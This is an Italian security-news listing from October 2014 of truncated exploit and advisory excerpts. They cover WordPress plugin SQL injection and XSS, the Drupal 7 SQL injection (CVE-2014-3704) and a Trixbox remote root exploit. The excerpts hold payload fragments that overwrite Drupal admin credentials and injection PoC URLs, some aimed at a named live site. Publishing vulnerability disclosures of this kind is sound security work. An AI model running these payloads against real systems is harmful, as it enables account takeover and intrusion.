WordPress CP Multi View Event Calendar 1.01 SQL Injection

24 ottobre 2014 - Fonte: http://www.mondounix.com
######################
 
# Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani 
 
# Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip
 
# Date : 2014-10-23
 
# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / sqlmap (0.8-1)
              Linux / Mozilla Firefox
              Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
 
# Description
 
CP Multi View Event Calendar 1.01 suffers from SQL injection vulnerability
 
calid variable is not sanitized.
 
######################
 
# PoC
 
http://localhost/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1...

Leggi il seguito »

WordPress Database Manager 2.7.1 Command Injection / Credential Leak

22 ottobre 2014 - Fonte: http://www.mondounix.com
Title: Vulnerabilities in WordPress Database Manager v2.7.1
Author: Larry W. Cashdollar, @_larry0
Date: 10/13/2014
Download: https://wordpress.org/plugins/wp-dbmanager/
Downloads: 1,171,358
Vendor: Lester Chan, https://profiles.wordpress.org/gamerz/
Contacted: 10/13/2014, Vulnerabilities addressed in v2.7.2.
Full Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-dbmanager-2.7.1/index.html
CVE: 2014-8334,2014-8335
OSVDBID: 113508,113507,113509
 
Description: "Allows you to optimize database, repair database, backup database, restore database, delete backup database , drop/empty tables and run selected queries. Supports automatic scheduling of backing up, optimizing and repairing of database."
 
Vulnerability:...

Leggi il seguito »

Drupal Core 7.32 SQL Injection (python Version)

19 ottobre 2014 - Fonte: http://www.mondounix.com
#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
    print "host username password"
    print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d\'" \
            +user \
            +"'+,+pass+%3d+'" \
  ...

Leggi il seguito »

Drupal Core 7.32 SQL Injection (PHP Version)

19 ottobre 2014 - Fonte: http://www.mondounix.com
<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#
 
$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'"...

Leggi il seguito »

Fonality Trixbox CE 2.8.0.4 Command Execution

17 ottobre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/perl
#
# Title: Fonality trixbox CE remote root exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered & Coded: 2 June 2014
# Published: 17 October 2014
# MorXploit Research
# http://www.MorXploit.com
# Software: trixbox CE
# Version: trixbox-2.8.0.4.iso
# Vendor url: http://www.fonality.com/
# Download: http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/
# Vulnerable file: maint/modules/home/index.php
#
# Description:
# maint/modules/home/index.php suffers from a command execution vulnerability, allowing an authenticated user to inject commands as the
# asterisk user which then can be leverged to root privilege through sudo.
#
# from /etc/sudoers:
## asterisk ALL =...

Leggi il seguito »

Drupal 7.X SQL Injection

17 ottobre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/python
#
# 
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)
#
# Tested on Drupal 7.31 with BackBox 3.x
#
# This material is intended for educational 
# purposes only and the author can not be held liable for 
# any kind of damages done whatsoever to your machine, 
# or damages caused by some other,creative application of this material.
# In any case you disagree with the above statement,stop here.
 
import hashlib, urllib2, optparse, random, sys
 
# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
# Calculate a non-truncated Drupal...

Leggi il seguito »

WordPress MaxButtons 1.26.0 Cross Site Scripting

16 ottobre 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23237
Product: MaxButtons WordPress plugin
Vendor: Max Foundry
Vulnerable Version(s): 1.26.0 and probably prior
Tested Version: 1.26.0
Advisory Publication:  September 24, 2014  [without technical details]
Vendor Notification: September 24, 2014 
Vendor Patch: October 2, 2014 
Public Disclosure: October 15, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7181
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory...

Leggi il seguito »

WordPress WP Google Maps 6.0.26 Cross Site Scripting

16 ottobre 2014 - Fonte: http://www.mondounix.com
Advisory ID: HTB23236
Product: WP Google Maps WordPress plugin
Vendor: WP Google Maps 
Vulnerable Version(s): 6.0.26 and probably prior
Tested Version: 6.0.26
Advisory Publication:  September 24, 2014  [without technical details]
Vendor Notification: September 24, 2014 
Vendor Patch: September 29, 2014 
Public Disclosure: October 15, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7182
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory...

Leggi il seguito »

Mozilla browser mem disclosure bugs (CVE-2014-1580)

14 ottobre 2014 - Fonte: http://www.mondounix.com

RIFERIMENTO: https://access.redhat.com/security/cve/CVE-2014-1580

CVE-2014-1580
Impatto: Moderate
Pubblico: 2014-10-14
Bugzilla: 1152362: CVE-2014-1580 Mozilla:
Further uninitialized memory use during GIF rendering (MFSA 2014-78)

Public POC:

First of all, CVE-2014-1580 (MSFA 2014-78) is a bug that caused Firefox prior to version 33 (released  today) to leak bits of uninitialized memory when rendering certain types of truncated images onto <canvas>.
 
Mozilla's advisory is here:
https://www.mozilla.org/security/announce/2014/mfsa2014-78.html
 
Bug is here:
https://bugzilla.mozilla.org/show_bug.cgi?id=1063733
 
PoC is here:
http://lcamtuf.coredump.cx/ffgif2/
 
Secondly,...

Leggi il seguito »

CMS Subkarma Cross Site Scripting / SQL Injection

14 ottobre 2014 - Fonte: http://www.mondounix.com
# Multiple SQL Injection & XSS on CMS SUBKARMA
 
# Risk: High
 
# CWE number: CWE-89,CWE-79
 
# Date: 13/10/2014
 
# Vendor: www.jttel.com.tw
 
# Author: Felipe " Renzi " Gabriel
 
# Contact: renzi@linuxmail.org
 
# Tested on:  Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906
 
# Vulnerables File: news.php ; product.php ; pro_con.php
 
# Exploits: http://www.target.com/news.php?id=[XSS]
 
            http://www.target.com/product.php?cat_id=[SQLI] & [XSS]
 
            http://www.target.com/pro_con.php?id=[SQLI] & [XSS]
 
 
# PoC:      http://www.cideko.com/product.php?cat_id=18  
 
            http://www.cideko.com/pro_con.php?id=3...

Leggi il seguito »